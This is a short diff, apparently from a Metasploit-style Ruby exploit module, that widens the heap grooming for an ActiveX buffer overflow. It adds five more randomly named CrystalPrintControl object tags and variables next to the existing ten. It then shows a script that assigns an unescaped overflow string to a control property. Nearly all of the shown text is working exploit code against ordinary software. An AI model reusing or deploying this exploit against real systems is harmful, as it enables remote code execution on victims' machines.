@@ -240,6 +240,11 @@ def load_exploit_html(my_target, cli)
240
240
target8 = rand_text_alpha ( 5 + rand ( 3 ) )
241
241
target9 = rand_text_alpha ( 5 + rand ( 3 ) )
242
242
target10 = rand_text_alpha ( 5 + rand ( 3 ) )
243
+ target11 = rand_text_alpha ( 5 + rand ( 3 ) )
244
+ target12 = rand_text_alpha ( 5 + rand ( 3 ) )
245
+ target13 = rand_text_alpha ( 5 + rand ( 3 ) )
246
+ target14 = rand_text_alpha ( 5 + rand ( 3 ) )
247
+ target15 = rand_text_alpha ( 5 + rand ( 3 ) )
243
248
244
249
# - 10 CrystalPrintControl objects are used to defragement the heap.
245
250
# - The 10th CrystalPrintControl is overflowed.
@@ -263,6 +268,11 @@ def load_exploit_html(my_target, cli)
263
268
<object id='#{ target8 } ' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
264
269
<object id='#{ target9 } ' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
265
270
<object id='#{ target10 } ' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
271
+ <object id='#{ target11 } ' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
272
+ <object id='#{ target12 } ' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
273
+ <object id='#{ target13 } ' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
274
+ <object id='#{ target14 } ' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
275
+ <object id='#{ target15 } ' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
266
276
<script>
267
277
var ret = unescape('#{ js_bof } ');
268
278
#{ target9 } .ServerResourceVersion = ret;
0 commit comments